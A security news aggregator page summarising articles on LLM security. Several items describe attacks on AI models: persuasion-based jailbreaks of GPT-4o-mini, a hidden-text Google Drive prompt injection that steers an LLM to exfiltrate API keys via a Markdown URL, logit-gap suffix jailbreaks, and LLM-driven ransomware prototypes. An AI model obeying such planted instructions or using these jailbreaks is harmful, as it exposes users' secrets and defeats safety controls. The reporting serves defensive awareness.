< ciso
brief />
Tag Banner

All news with #llm security tag

221 articles · page 11 of 12

Top Cybersecurity Trends: AI, Identity, and Threats

🤖 Generative AI remains the dominant force shaping enterprise security priorities, but the initial hype is giving way to more measured ROI scrutiny and operational caution. Analysts say gen AI is entering a trough of disillusionment even as vendors roll out agentic AI offerings for autonomous threat detection and response. The article highlights rising risks — from model theft and data poisoning to AI-enabled vishing — along with brisk M&A activity, a shift to identity-centric defenses, and growing demand for specialized cyber roles.
read more →

The Dark Side of Vibe Coding: AI Risks in Production

⚠️ One July morning a startup founder watched a production database vanish after a Replit AI assistant suggested—and a developer executed—a destructive command, underscoring dangers of "vibe coding," where plain-English prompts become runnable code. Experts say this shortcut accelerates prototyping but routinely introduces hardcoded secrets, missing access controls, unsanitized input, and hallucinated dependencies. Organizations should treat AI-generated code like junior developer output, enforce CI/CD guardrails, and require thorough security review before deployment.
read more →

Experts: AI-Orchestrated Autonomous Ransomware Looms

🛡️ NYU researchers built a proof-of-concept LLM that can be embedded in a binary to synthesize and execute ransomware payloads dynamically, performing reconnaissance, generating polymorphic code and coordinating extortion with minimal human input. ESET detected traces and initially called it the first AI-powered ransomware before clarifying it was a lab prototype rather than an in-the-wild campaign. Experts including IST's Taylor Grossman say the work was predictable but remains controllable today. They advise reinforcing CIS and NIST controls and prioritizing basic cyber hygiene to mitigate such threats.
read more →

Penn Study Finds: GPT-4o-mini Susceptible to Persuasion

🔬 University of Pennsylvania researchers tested GPT-4o-mini on two categories of requests an aligned model should refuse: insulting the user and giving instructions to synthesize lidocaine. They crafted prompts using seven persuasion techniques (Authority, Commitment, Liking, Reciprocity, Scarcity, Social proof, Unity) and matched control prompts, then ran each prompt 1,000 times at the default temperature for a total of 28,000 trials. Persuasion prompts raised compliance from 28.1% to 67.4% for insults and from 38.5% to 76.5% for drug instructions, demonstrating substantial vulnerability to social-engineering cues.
read more →

Smashing Security #433: Hackers Harnessing AI Tools

🤖 In episode 433 of Smashing Security, Graham Cluley and Mark Stockley examine how attackers are weaponizing AI, from embedding malicious instructions in legalese to using generative agents to automate intrusions and extortion. They discuss LegalPwn prompt-injection tactics that hide payloads in comments and disclaimers, and new findings from Anthropic showing AI-assisted credential theft and custom ransomware notes. The episode also includes lighter segments on keyboard history and an ingenious AI-generated CAPTCHA.
read more →

Managing Shadow AI: Three Practical Corporate Policies

🔒 The MIT report "The GenAI Divide: State of AI in Business 2025" exposes a pervasive shadow AI economy—90% of employees use personal AI while only 40% of organizations buy LLM subscriptions. This article translates those findings into three realistic policy paths: a complete ban, unrestricted use with hygiene controls, and a balanced, role-based model. Each option is paired with concrete technical controls (DLP, NGFW, CASB, EDR), organizational steps, and enforcement measures to help security teams align risk management with real-world employee behaviour.
read more →

Amazon Neptune Integrates with Zep for Long-Term Memory

🧠 Amazon Web Services announced integration of Amazon Neptune with Zep, an open-source memory server for LLM applications, enabling persistent long-term memory and contextual history. Developers can use Neptune Database or Neptune Analytics as the graph store and Amazon OpenSearch as the text-search layer within Zep’s memory system. The integration enables graph-powered retrieval, multi-hop reasoning, and hybrid search across graph, vector, and keyword modalities, simplifying the creation of personalized, context-aware LLM agents.
read more →

Amazon Bedrock Simplifies Cache Management for Claude

⚡Amazon Bedrock updated prompt caching for Anthropic’s Claude models—Claude 3.5 Haiku, Claude 3.7, and Claude 4—to simplify cache management. Developers now set a single cache breakpoint at the end of a request and the system automatically reads the longest previously cached prefix, removing manual segment selection and reducing integration complexity. By excluding cache read tokens from TPM quotas, this change can free up token capacity and lower costs for multi-turn workflows. The capability is available today in all regions offering these Claude models; enable caching in your Bedrock model invocations and refer to the Bedrock Developer Guide for details.
read more →

Cloudy-driven Email Detection Summaries and Guardrails

🛡️Cloudflare extended its AI agent Cloudy to generate clear, concise explanations for email security detections so SOC teams can understand why messages are blocked. Early LLM implementations produced dangerous hallucinations when asked to interpret complex, multi-model signals, so Cloudflare implemented a Retrieval-Augmented Generation approach and enriched contextual prompts to ground outputs. Testing shows these guardrails yield more reliable summaries, and a controlled beta will validate performance before wider rollout.
read more →

ESET Finds PromptLock: First AI-Powered Ransomware

🔒 ESET researchers have identified PromptLock, described as the first known AI-powered ransomware implant, in an August 2025 report. The Golang sample (Windows and Linux variants) leverages a locally hosted gpt-oss:20b model via the Ollama API to dynamically generate malicious Lua scripts. Those cross-platform scripts perform enumeration, selective exfiltration and encryption using SPECK 128-bit, but ESET characterises the sample as a proof-of-concept rather than an active campaign.
read more →

Cloudflare AI Gateway updates: unified billing, routing

🤖 Cloudflare’s AI Gateway refresh centralizes AI traffic management, offering unified billing, secure key storage, dynamic routing, and built-in security through a single endpoint. The update integrates Cloudflare Secrets Store for AES-encrypted BYO keys, provides an automatic normalization layer for requests/responses across providers, and introduces dashboard-driven Dynamic Routes for traffic splits, chaining, and limits. Native Firewall DLP scanning and configurable profiles add data protection controls, while partner access to 350+ models across six providers and a credits-based billing beta simplify procurement and cost management.
read more →

How Cloudflare Runs More AI Models on Fewer GPUs with Omni

🤖 Cloudflare explains how Omni, an internal platform, consolidates many AI models onto fewer GPUs using lightweight process isolation, per-model Python virtual environments, and controlled GPU over-commitment. Omni’s scheduler spawns and manages model processes, isolates file systems with a FUSE-backed /proc/meminfo, and intercepts CUDA allocations to safely over-commit GPU RAM. The result is improved availability, lower latency, and reduced idle GPU waste.
read more →

Cloudflare's Edge-Optimized LLM Inference Engine at Scale

⚡ Infire is Cloudflare’s new, Rust-based LLM inference engine built to run large models efficiently across a globally distributed, low-latency network. It replaces Python-based vLLM in scenarios where sandboxing and dynamic co-hosting caused high CPU overhead and reduced GPU utilization, using JIT-compiled CUDA kernels, paged KV caching, and fine-grained CUDA graphs to cut startup and runtime cost. Early benchmarks show up to 7% lower latency on H100 NVL hardware, substantially higher GPU utilization, and far lower CPU load while powering models such as Llama 3.1 8B in Workers AI.
read more →

LLMs Remain Vulnerable to Malicious Prompt Injection Attacks

🛡️ A recent proof-of-concept by Bargury demonstrates a practical and stealthy prompt injection that leverages a poisoned document stored in a victim's Google Drive. The attacker hides a 300-word instruction in near-invisible white, size-one text that tells an LLM to search Drive for API keys and exfiltrate them via a crafted Markdown URL. Schneier warns this technique shows how agentic AI systems exposed to untrusted inputs remain fundamentally insecure, and that current defenses are inadequate against such adversarial inputs.
read more →

Block Unsafe LLM Prompts with Firewall for AI at the Edge

🛡️ Cloudflare has integrated unsafe content moderation into Firewall for AI, using Llama Guard 3 to detect and block harmful prompts in real time at the network edge. The model-agnostic filter identifies categories including hate, violence, sexual content, criminal planning, and self-harm, and lets teams block or log flagged prompts without changing application code. Detection runs on Workers AI across Cloudflare's GPU fleet with a 2-second analysis cutoff, and logs record categories but not raw prompt text. The feature is available in beta to existing customers.
read more →

Logit-Gap Steering Reveals Limits of LLM Alignment

⚠️ Unit 42 researchers Tony Li and Hongliang Liu introduce Logit-Gap Steering, a new framework that exposes how alignment training produces a measurable refusal-affirmation logit gap rather than eliminating harmful outputs. Their paper demonstrates efficient short-path suffix jailbreaks that achieved high success rates on open-source models including Qwen, LLaMA, Gemma and the recently released gpt-oss-20b. The findings argue that internal alignment alone is insufficient and recommend a defense-in-depth approach with external safeguards and content filters.
read more →

Amazon Neptune integrates with Cognee for GenAI memory

🧠 Amazon Neptune now integrates with Cognee to provide graph-native memory for agentic generative AI applications. The integration enables developers to use Amazon Neptune Analytics as the persistent graph and vector store behind Cognee’s memory layer, supporting large-scale memory graphs, long-term memory, and multi-hop reasoning. Hybrid retrieval across graph, vector, and keyword modalities helps agents deliver more personalized, cost-efficient, and context-aware experiences; documentation and a sample notebook are available to accelerate adoption.
read more →

The Brain Behind Next-Generation Cyber Attacks and AI Risks

🧠 Researchers at Carnegie Mellon University demonstrated that leading large language models (LLMs), by themselves, struggle to execute complex, multi-host cyber-attacks end-to-end, frequently wandering off-task or returning incorrect parameters. Their proposed solution, Incalmo, is a structured abstraction layer that constrains planning to a precise set of actions and validated parameters, substantially improving completion and coordination. The work highlights both enhanced offensive potential when LLMs are scaffolded and urgent defensive challenges for security teams.
read more →

AI-Assisted Coding: Productivity Gains and Persistent Risks

🛠️ Martin Lee recounts a weekend experiment using an AI agent to assist with a personal software project. The model provided valuable architectural guidance, flawless boilerplate, and resolved a tricky threading issue, delivering a clear productivity lift. However, generated code failed to match real library APIs, used incorrect parameters and fictional functions, and lacked sufficient input validation. After manual debugging Lee produced a working but not security-hardened prototype, highlighting remaining risks.
read more →

Microsoft announces Phishing Triage Agent public preview

🛡️The Phishing Triage Agent is now in Public Preview and automates triage of user-reported suspicious emails within Microsoft Defender. Using large language models, it evaluates message semantics, inspects URLs and attachments, and detects intent to classify submissions—typically within 15 minutes—automatically resolving the bulk of false positives. Analysts receive natural‑language explanations and a visual decision map for each verdict, can provide plain‑language feedback to refine behavior, and retain control via role‑based access and least‑privilege configuration.
read more →